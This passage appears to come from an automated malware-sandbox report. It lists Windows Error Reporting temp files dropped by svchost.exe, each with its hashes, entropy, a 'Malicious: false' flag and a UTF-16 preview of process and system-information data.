Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER31F7.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.697559635825199
Encrypted:	false
SSDEEP:	96:TiZYWtcdlaqByYYUYjfOsHIYEZUrtFiMMjXtwSwlm0LaSFyMfqGIXh6:2ZDs5zyGiaSFyMfqBXh6
MD5:	9942F20C90564AEDA42A48AA2E0630DB
SHA1:	9CBDF5F89BE698FF240A381D9935A3DE07216E68
SHA-256:	A06271DBAE7759FDF9D91668D8748C17998F7BD1656316DD1EB0915C12544197
SHA-512:	52CE6BF94D07E3E892152699842DAE07E9CECBD7A78822A7EF687FAF263B42D5DE61148D92CC1901554FB6A944E7CF8E56211E4FC8F423BC5F27DE488CEDEA42
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3236.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	93666
Entropy (8bit):	3.037477680417758
Encrypted:	false
SSDEEP:	1536:NAH3vYv74DHEJ06Aw8HwsmeXL+nP+VshGLKVGNDVQSNH+XeOwi9dajY+cj7W:NAH3vYv74DHEJ06Aw8HwsmeXL+nP+Vs2
MD5:	225168A0A36F8273E4F2373A9233371E
SHA1:	BE469EBDC643FD0A73D6103AD9F80BAD1DE99905
SHA-256:	A4E1D567A5ACFEC0FD68FB521E25C7CCFCFDD58626E212C369CE522B3CC603F4
SHA-512:	461B8D94E6363EAE011A688321A3C71D889517DD1FD53F825F27E93F151BDD757CCED2D5A6523095ED0DE4348A7F88EF5F8E0AA77FDA2D59614EF92E547DE836
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3535.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.698563206102792
Encrypted:	false
SSDEEP:	96:TiZYW/sc94R2YHYiQfVzHy+YEZ+TtFiYM8XTwZfjQ2UaBcF7MJq+UNITh6:2ZDVk2gjSIaBcF7MJq+Th6
MD5:	F3EB41D7D202F232D0437B9E743D9E5C
SHA1:	5B4F7E0C606D36A8F7A050DCF5704B1D42216E5E
SHA-256:	9C33F079356D97DDC40D10E80B7018BC4FD641F6A04BA01C000678F86142A941
SHA-512:	F67A61DF3EFADFBE30910AAB72F10E61B381B1599DEF67D86B7334C5DC29C095E206DFF55C3341F5CDDA72BFF80F3EF6FAF0CA2A516371611604DB1B32D6E0B6
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C99.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	92460
Entropy (8bit):	3.039070630211415
Encrypted:	false
SSDEEP:	1536:puH3/cu1djf1k8Hu1BXXL+zP+VshGLKVGNDVQS9EmRV0byddbT8ti:puH3/cu1djf1k8Hu1BXXL+zP+VshGLKu
MD5:	4D5ABB26C7294FC5337C7F92E0B4EB06
SHA1:	5E928D61FCA9C6D1BFDE3F42887FE743B775E195
SHA-256:	3CFB221086001843C06A87992727BC5493ECA134A9BA30829E7EA9D19571F645
SHA-512:	9FB48316D41814E5805F9FEA8E2788C54D40164006BAEE498FAAB3B228B360D35AFEA921938B5BF9AA27E899C1A7474DC8EF7729356CB6F1175298BD0A13E799
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER43AE.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	93708
Entropy (8bit):	3.0374607437558363
Encrypted:	false
SSDEEP:	1536:P8vY1AYngpTxqLwJ5llXXL+xPKiVshGLKVqweo6wHUEa5oereDQTWJO:P8vY1AYngpTxqLwJ5llXXL+xPKiVshGV
MD5:	6D705C9A8E9FD0B8D37046B5CC404C5C
SHA1:	93234A0EEFCE9F8FE1407845CEB9EDC6C0545406
SHA-256:	FF11A93632EE6DC21ADC731C59C6C75FAA9A189C34965DE288F291F88B074D7F
SHA-512:	A0C1F107209CF5341982646FB4F1C3F2B4DD63AED5491618505C53A581F0DD3CFAE40CA1E3E616ECCBB0BDE4AC1D1278E9C05E0F14B486D3B90C1C200424B244
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER43EE.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.697399406744815
Encrypted:	false
SSDEEP:	96:TiZYW/5OiJxYlY3Bp3NzH7YEZU3tFiPMEXXwrxOUaTFkMTq8IFhP:2ZDTC4ENtaTFkMTq7FhP
MD5:	BB8001EE70D74F91FE545C47A478CE28
SHA1:	242B0258A5EEC80D17DF7220FE87F6062943C156
SHA-256:	9904327DC348FB49488286E067ACB73413657BE3B6F68AF25994826E2C527AE2
SHA-512:	8C6649874155285B666DA33BAF9B9068A3DD25490EC44807DE4474BC48EFC795873A470A7AD20E098E0798F1AC5FABABA1338CD27039D634F15F7F4310FBBBE8
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4508.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6973482550947536
Encrypted:	false
SSDEEP:	96:TiZYWuzoi1pQYtyYOpUlH8YEZ7XtFiBMEXswCiu0lfaCzFvM1fqTIIhP:2ZDuKPj7A1aCzFvMdqcIhP
MD5:	72344BD74207D78C5AC4F32EAD16D025
SHA1:	6B782CE6E1362DF586B571A56F1DB387B44A60E5
SHA-256:	65E133C67B0FA5B2EA21FE1C5A4A676A20AA45FC87259096B6F0BB6D5F62FC9A
SHA-512:	B100154EB98731C3F15441F237C398B634730EE95EE66B4193E6F4EA35CB5D338F4A24EA2D04E4115C66469C0AE6AA0E32F6867BD24C975AD981BEEDEC8B4FEF
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DD.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	89252
Entropy (8bit):	3.0417797481867086
Encrypted:	false
SSDEEP:	1536:918NMwk81R6wX+X4qjLLQ7WqXL+lPHVshGLKVGNDVQScfAW6G4wcYRv:918NMwk81R6wX+X4qjLLQ7WqXL+lPHVc
MD5:	223E6742F2ABEFA6DC381ECFFE687E24
SHA1:	5C9F8371348D4731FF56077D09C7AF0EE5F3765D
SHA-256:	1C2A432CF0A21673C520EE6FF9D61986B5A80B11A57CC93521BD79461F8C6258
SHA-512:	60CFDCF46CE27D4D87254F28DDFE18157FA611522748E22F43032C6D4FB36350AB163782DADEE41D6EA64AE6FA434CFEC55EE2C7842919ACD1DBEAAAB8876ED0
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER71C.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6959439223021406
Encrypted:	false
SSDEEP:	96:TiZYWBmAIOYhYoziX2HhYEZ1XtFi+MyX+wiv4LacFl6MAqlxIU+hlj:2ZDDmO0WeacFl6MAqluU+hlj
MD5:	ED6D66DDE525CB737ACAA4ED02F0CAC2
SHA1:	8EE89E25F37FFEF379817EB5BCEBBF12D096EF87
SHA-256:	D2E2CE985330BCE360D37EAF9BAB6F16EF3AE5666076B7FF6BB37443C3D5A320
SHA-512:	F0B2C01E4C9C9F12C6710CCE3A382806DB2C2D4EF3C372A359E9C7A49A4FCCE97E627F1360D52A085DE3E2CE7C5F3EF479716F1E01B9AB22B6A003BBB04A67D6
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA2BE.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	91036
Entropy (8bit):	3.040481329366388
Encrypted:	false
SSDEEP:	1536:Jy1y0YNtVw0sOCvmltu2yQA6n1G5UE96yvQOxhPZU0nn1TVUvOZ+tj09I:Jy1y0YNtVw0sOCvmltu2yQA6n1G5UE9o
MD5:	CF3A8FA24514D5CB63876ECA9F20D7DB
SHA1:	9F826BA9776515190C926ADD9DA7038AB5B36088
SHA-256:	C93C1B55AB470E91E97E77B4CD7F27D1AB8330D5BD25633415D66661A0E930D0
SHA-512:	E7312F273CA8332554D5BBA706134E8C266A6F8BA54C7078A06A3E75BCE4C80D9848B3E03268691B2AC7E3DAC2DA221A8AB83C07D8294A1539553D53B2F23F35
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA34B.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6934856396422764
Encrypted:	false
SSDEEP:	96:TiZYWEz4cn2gYZYQ7DufdHeYEZDjtFibMTXlw5MDFa/CFNMDqjTIzhC:2ZDWHejIIFaKFNMDqjczhC
MD5:	10516C66A17DBD47AE05D970D32EE04E
SHA1:	6A8EBB9D0AB9E46B3863576368667A4D17CB3F0B
SHA-256:	35648288337249F60C0F383F8371162A15D6C0D8DF2D4D16CDB2E7A72BA894F0
SHA-512:	3D2E4273883B623DA0CA29B052F39601EF3D85913E6115B8FF013920D10449618FDF32958706E4C4DD9D082DA919888023A8067B2683BD228AF936F38D95CF0E
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . 